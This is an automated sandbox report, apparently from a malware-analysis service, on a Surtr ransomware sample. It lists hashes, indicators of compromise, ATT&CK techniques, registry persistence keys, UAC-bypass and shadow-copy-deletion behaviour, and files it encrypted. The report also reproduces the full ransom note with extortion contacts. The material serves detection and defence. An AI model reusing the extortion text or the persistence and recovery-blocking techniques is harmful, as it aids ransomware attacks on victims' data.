surtr | 459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712

Analysis

max time kernel
172s
max time network
184s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
09-11-2022 16:00

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe
Size

333KB
MD5

393e9f112cc999ebd9333877bcc7535e
SHA1

ed65581b6c3980b3ddf623a4d2f61ce08ce59bdf
SHA256

459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712
SHA512

021116a238f84e003ba6a5817b4d6ed27637ed6bc1d6d424533813d70964953c9deb1c62e94bae89db7c59f09dcc76ee5c92ad66c8e7688cd0d4643bc6d72c83
SSDEEP

6144:05qtAQ4n9hFPMRp8wayVlTrsusy6szJzHRhDK:MqtYHU8NqrskxHRhDK

Score

10^/10

surtr evasion persistence ransomware spyware stealer trojan upx

Malware Config

Extracted

Path

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\SURTR_README.hta

Family

surtr

Ransom Note

SurtrRansomware OOPS ALL YOUR IMPORTANT FILES HAVE BEEN ENCRYPTED AND STOLEN !! Notice : There is only one way to restore your data read the boxes carefully! Attention : Do Not change file names. Do Not try to decrypt using third party softwares , it may cause permanent data loss . your files will be sold on the Dark Web after 15 days. Imagine 1 million hackers have all your information including files, IP, name and number and location and ... Do not pay any money before decrypting the test files. You can use our 50% discount if you pay the fee within first 15 days of encryption . otherwise the price will be doubled. In order to warranty you , our team will decrypt 3 of your desired files for free.but you need to pay the specified price for the rest of the operation . How To Decrypt : Your system is offline . in order to contact us you can email this address [email protected] use this ID (cJ6oH75fDMhErg) for the title of your email . If you weren't able to contact us within 24 hours please email : [email protected] If you didn't get any respond within 48 hours use this link (Not Available Now).send your ID and your cryptor name (SurtrRansomwareUserName) therefore we can create another way to contact you as soon as possible

Emails

[email protected]

Signatures

Detects Surtr Payload 2 IoCs

resource	yara_rule
behavioral2/memory/4696-133-0x00007FF72FB20000-0x00007FF72FC81000-memory.dmp	family_surtr
behavioral2/memory/4696-205-0x00007FF72FB20000-0x00007FF72FC81000-memory.dmp	family_surtr

Surtr
Ransomware family first seen in late 2021.
ransomware surtr

UAC bypass 3 TTPs 1 IoCs

evasion trojan

Bypass User Account Control

T1088

Disabling Security Tools

T1089

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs

ransomware evasion

Inhibit System Recovery

T1490

pid	Process
3484	bcdedit.exe
2336	bcdedit.exe

Disables Task Manager via registry modification
evasion
Disables use of System Restore points 1 TTPs
evasion

Inhibit System Recovery
T1490

UPX packed file 3 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/4696-133-0x00007FF72FB20000-0x00007FF72FC81000-memory.dmp	upx
behavioral2/files/0x0006000000022e36-199.dat	upx
behavioral2/memory/4696-205-0x00007FF72FB20000-0x00007FF72FC81000-memory.dmp	upx

Drops startup file 6 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.hta	net.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.txt	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.txt	cmd.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Surtr.exe	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Surtr.exe	cmd.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.hta	net.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 8 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\svchos3 = "C:\\ProgramData\\Service\\Surtr.exe"	cmd.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\svchos4 = "C:\\ProgramData\\Service\\Surtr.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchos1 = "C:\\ProgramData\\Service\\Surtr.exe"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchos2 = "C:\\ProgramData\\Service\\Surtr.exe"	reg.exe

Enumerates connected drives 3 TTPs 24 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\L:	459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe
File opened (read-only)	\??\N:	459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe
File opened (read-only)	\??\P:	459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe
File opened (read-only)	\??\S:	459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe
File opened (read-only)	\??\T:	459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe
File opened (read-only)	\??\E:	459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe
File opened (read-only)	\??\F:	459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe
File opened (read-only)	\??\I:	459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe
File opened (read-only)	\??\J:	459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe
File opened (read-only)	\??\M:	459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe
File opened (read-only)	\??\V:	459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe
File opened (read-only)	\??\X:	459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe
File opened (read-only)	\??\Y:	459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe
File opened (read-only)	\??\W:	459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe
File opened (read-only)	\??\A:	459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe
File opened (read-only)	\??\G:	459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe
File opened (read-only)	\??\H:	459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe
File opened (read-only)	\??\K:	459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe
File opened (read-only)	\??\R:	459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe
File opened (read-only)	\??\U:	459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe
File opened (read-only)	\??\O:	459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe
File opened (read-only)	\??\Q:	459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe
File opened (read-only)	\??\Z:	459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe
File opened (read-only)	\??\B:	459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
13	ip-api.com

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ecf.provider.filetransfer_3.2.200.v20140827-1444.jar.[[email protected]].SURT	459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui_3.106.0.v20140812-1751.jar.[[email protected]].SURT	459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\TRANSLAT\ENES\MSB1ENES.ITS.[[email protected]].SURT	459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe
File opened for modification	C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\it\System.Management.Instrumentation.Resources.dll.[[email protected]].SURT	459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ClickToRun\C2RINTL.lv-lv.dll.[[email protected]].SURT	459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\jre\lib\security\blacklist.[[email protected]].SURT	459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\LogoImages\WinWordLogoSmall.contrast-white_scale-100.png.[[email protected]].SURT	459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\MSIPC\no\msipc.dll.mui.[[email protected]].SURT	459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Templates\1033\EssentialReport.dotx.[[email protected]].SURT	459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe
File opened for modification	C:\Program Files\7-Zip\Lang\fi.txt.[[email protected]].SURT	459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\VisioProR_Trial-ppd.xrm-ms.[[email protected]].SURT	459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\MSQRY32.CHM.[[email protected]].SURT	459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\META-INF\eclipse.inf.[[email protected]].SURT	459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Integration\C2RManifest.PowerPoint.PowerPoint.x-none.msi.16.x-none.xml.[[email protected]].SURT	459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ink\zh-TW\tipresx.dll.mui.[[email protected]].SURT	459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-nodes.xml.[[email protected]].SURT	459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-swing-outline.jar.[[email protected]].SURT	459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\config\Modules\org-netbeans-modules-options-keymap.xml_hidden.[[email protected]].SURT	459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\AccessR_Retail-ppd.xrm-ms.[[email protected]].SURT	459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected].[[email protected]].SURT	459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ink\en-US\InkObj.dll.mui.[[email protected]].SURT	459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\main\base_altgr.xml.[[email protected]].SURT	459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe
File opened for modification	C:\Program Files\Mozilla Firefox\precomplete.[[email protected]].SURT	459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\OneNoteR_Retail-pl.xrm-ms.[[email protected]].SURT	459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\BORDERS\MSART14.BDR.[[email protected]].SURT	459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\[email protected].[[email protected]].SURT	459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe
File opened for modification	C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\de\UIAutomationProvider.resources.dll.[[email protected]].SURT	459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe
File opened for modification	C:\Program Files\Java\jre1.8.0_66\lib\deploy\messages.properties.[[email protected]].SURT	459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusR_Subscription3-ul-oob.xrm-ms.[[email protected]].SURT	459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe
File opened for modification	C:\Program Files\Common Files\System\msadc\adcjavas.inc.[[email protected]].SURT	459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe
File opened for modification	C:\Program Files\Common Files\System\msadc\es-ES\msdaprsr.dll.mui.[[email protected]].SURT	459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\jre\lib\ext\sunjce_provider.jar.[[email protected]].SURT	459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ql_2.0.100.v20131211-1531.jar.[[email protected]].SURT	459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessPipcR_OEM_Perp-ul-oob.xrm-ms.[[email protected]].SURT	459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\HomeStudent2019R_Retail-ul-oob.xrm-ms.[[email protected]].SURT	459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ink\en-US\micaut.dll.mui.[[email protected]].SURT	459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ink\tr-TR\tipresx.dll.mui.[[email protected]].SURT	459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\NPSPWRAP.DLL.[[email protected]].SURT	459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\NewCommentRTL.png.[[email protected]].SURT	459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\cgg\LC_MESSAGES\vlc.mo.[[email protected]].SURT	459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\VisioPro2019XC2RVL_KMS_ClientC2R-ul.xrm-ms.[[email protected]].SURT	459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\MSIPC\sl\msipc.dll.mui.[[email protected]].SURT	459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Client\api-ms-win-crt-time-l1-1-0.dll.[[email protected]].SURT	459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\URLREDIR.DLL.[[email protected]].SURT	459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\STSUPLD.DLL.[[email protected]].SURT	459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\ps\LC_MESSAGES\vlc.mo.[[email protected]].SURT	459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe
File opened for modification	C:\Program Files\Common Files\System\ado\msadox.dll.[[email protected]].SURT	459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\license.html.[[email protected]].SURT	459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\MondoR_BypassTrial180-ppd.xrm-ms.[[email protected]].SURT	459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\ZeroByteFile.[[email protected]].SURT	459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\jre\lib\jfr.jar.[[email protected]].SURT	459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe
File opened for modification	C:\Program Files\Java\jre1.8.0_66\lib\cmm\PYCC.pf.[[email protected]].SURT	459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-modules-applemenu.jar.[[email protected]].SURT	459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusR_Subscription4-ppd.xrm-ms.[[email protected]].SURT	459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProjectPro2019VL_KMS_Client_AE-ppd.xrm-ms.[[email protected]].SURT	459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\WordVL_KMS_Client-ul-oob.xrm-ms.[[email protected]].SURT	459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\index.win32.bundle.[[email protected]].SURT	459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\DataModel\Microsoft.Excel.Tabular.dll.[[email protected]].SURT	459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ink\sr-Latn-RS\tipresx.dll.mui.[[email protected]].SURT	459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\jre\bin\j2pkcs11.dll.[[email protected]].SURT	459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\gd\LC_MESSAGES\vlc.mo.[[email protected]].SURT	459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Smart Tag\1033\STINTL.DLL.[[email protected]].SURT	459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\am\LC_MESSAGES\vlc.mo.[[email protected]].SURT	459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe
File opened for modification	C:\Program Files\Java\jre1.8.0_66\bin\hprof.dll.[[email protected]].SURT	459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
4252	schtasks.exe
2428	schtasks.exe

Interacts with shadow copies 2 TTPs 3 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

pid	Process
3988	vssadmin.exe
2316	vssadmin.exe
1936	vssadmin.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

pid	Process
4696	459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe
4696	459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe
4696	459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe
4696	459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe
4696	459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe
4696	459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe
4696	459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe
4696	459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeBackupPrivilege	2364	vssvc.exe
Token: SeRestorePrivilege	2364	vssvc.exe
Token: SeAuditPrivilege	2364	vssvc.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4696 wrote to memory of 3032	4696	459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe	80
PID 4696 wrote to memory of 3032	4696	459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe	80
PID 4696 wrote to memory of 1320	4696	459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe	81
PID 4696 wrote to memory of 1320	4696	459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe	81
PID 4696 wrote to memory of 4760	4696	459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe	82
PID 4696 wrote to memory of 4760	4696	459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe	82
PID 4760 wrote to memory of 4708	4760	cmd.exe	83
PID 4760 wrote to memory of 4708	4760	cmd.exe	83
PID 4696 wrote to memory of 4672	4696	459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe	85
PID 4696 wrote to memory of 4672	4696	459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe	85
PID 4696 wrote to memory of 1172	4696	459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe	84
PID 4696 wrote to memory of 1172	4696	459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe	84
PID 4696 wrote to memory of 4784	4696	459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe	86
PID 4696 wrote to memory of 4784	4696	459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe	86
PID 4784 wrote to memory of 4552	4784	cmd.exe	88
PID 4784 wrote to memory of 4552	4784	cmd.exe	88
PID 1172 wrote to memory of 2316	1172	cmd.exe	89
PID 1172 wrote to memory of 2316	1172	cmd.exe	89
PID 4672 wrote to memory of 1936	4672	cmd.exe	90
PID 4672 wrote to memory of 1936	4672	cmd.exe	90
PID 4552 wrote to memory of 4308	4552	net.exe	91
PID 4552 wrote to memory of 4308	4552	net.exe	91
PID 4696 wrote to memory of 520	4696	459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe	94
PID 4696 wrote to memory of 520	4696	459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe	94
PID 520 wrote to memory of 2616	520	cmd.exe	95
PID 520 wrote to memory of 2616	520	cmd.exe	95
PID 2616 wrote to memory of 4660	2616	net.exe	96
PID 2616 wrote to memory of 4660	2616	net.exe	96
PID 4696 wrote to memory of 2116	4696	459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe	97
PID 4696 wrote to memory of 2116	4696	459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe	97
PID 4696 wrote to memory of 1332	4696	459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe	98
PID 4696 wrote to memory of 1332	4696	459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe	98
PID 4696 wrote to memory of 2292	4696	459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe	99
PID 4696 wrote to memory of 2292	4696	459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe	99
PID 2116 wrote to memory of 3988	2116	cmd.exe	100
PID 2116 wrote to memory of 3988	2116	cmd.exe	100
PID 2292 wrote to memory of 3904	2292	cmd.exe	102
PID 2292 wrote to memory of 3904	2292	cmd.exe	102
PID 1332 wrote to memory of 3484	1332	cmd.exe	101
PID 1332 wrote to memory of 3484	1332	cmd.exe	101
PID 3904 wrote to memory of 3808	3904	net.exe	103
PID 3904 wrote to memory of 3808	3904	net.exe	103
PID 4696 wrote to memory of 2152	4696	459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe	104
PID 4696 wrote to memory of 2152	4696	459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe	104
